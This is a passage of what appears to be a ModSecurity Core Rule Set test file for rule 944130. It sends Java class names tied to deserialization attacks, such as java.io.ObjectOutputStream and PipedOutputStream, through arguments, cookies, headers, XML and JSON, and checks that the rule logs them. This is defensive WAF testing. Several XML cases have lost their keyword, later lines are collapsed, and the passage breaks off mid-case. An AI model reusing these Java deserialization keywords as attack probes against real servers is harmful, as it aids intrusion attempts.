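            version: "HTTP/1.0"
            data: "java.io.InputStreamReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-162
    desc: "Content-Type text/plain includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.InputStreamReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-163
    desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.io.InputStreamReader\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-164
    desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.InputStreamReader\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # java.io.LineNumberReader: cases 944130-165 to 944130-175.
  - test_title: 944130-165
    desc: "Argument test includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.LineNumberReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-166
    desc: "Argument name includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.LineNumberReader=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-167
    desc: "Cookie test includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.io.LineNumberReader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-168
    desc: "Cookie name includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.io.LineNumberReader=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-169
    desc: "Request header test includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.io.LineNumberReader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): as printed, data is just "element_value" -- the keyword named
  # in desc is absent, so the XML markup was presumably lost in extraction.
  - test_title: 944130-170
    desc: "XML attribute value includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-171
    desc: "XML element value includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.LineNumberReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-172
    desc: "Nested XML element value includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.LineNumberReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-173
    desc: "Content-Type text/plain includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.LineNumberReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-174
    desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.io.LineNumberReader\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-175
    desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.LineNumberReader\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # java.io.ObjectOutputStream: cases 944130-176 onward; the group runs past
  # the end of this span.
  - test_title: 944130-176
    desc: "Argument test includes keyword java.io.ObjectOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.ObjectOutputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-177
    desc: "Argument name includes keyword java.io.ObjectOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.ObjectOutputStream=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-178
    desc: "Cookie test includes keyword java.io.ObjectOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.io.ObjectOutputStream
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-179
    desc: "Cookie name includes keyword java.io.ObjectOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.io.ObjectOutputStream=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-180
    desc: "Request header test includes keyword java.io.ObjectOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.io.ObjectOutputStream
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): as printed, data is just "element_value" -- the keyword named
  # in desc is absent, so the XML markup was presumably lost in extraction.
  - test_title: 944130-181
    desc: "XML attribute value includes keyword java.io.ObjectOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  # Case 944130-182 runs past the end of this span; its visible start is kept
  # in the original collapsed form so the following line still joins onto it.
  - test_title: 944130-182 desc: "XML element value includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: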
"ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ObjectOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-183 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.ObjectOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-184 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.ObjectOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-185 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" 
Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.ObjectOutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-186 desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.ObjectOutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-187 desc: "Argument test includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.OutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-188 desc: "Argument name includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.OutputStream=test" output: log_contains: "id \"944130\"" - test_title: 
944130-189 desc: "Cookie test includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.OutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-190 desc: "Cookie name includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.OutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-191 desc: "Request header test includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.OutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-192 desc: "XML attribute value includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: 
"ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-193 desc: "XML element value includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.OutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-194 desc: "Nested XML element value includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.OutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-195 desc: "Content-Type text/plain includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: 
"POST" version: "HTTP/1.0" data: "test=java.io.OutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-196 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.OutputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-197 desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.OutputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-198 desc: "Argument test includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.PipedOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-199 desc: "Argument name includes keyword 
java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.PipedOutputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-200 desc: "Cookie test includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.PipedOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-201 desc: "Cookie name includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.PipedOutputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-202 desc: "Request header test includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.PipedOutputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-203 desc: "XML attribute value includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-204 desc: "XML element value includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PipedOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-205 desc: "Nested XML element value includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
"application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.PipedOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-206 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.PipedOutputStream" output: log_contains: "id \"944130\"" - test_title: 944130-207 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 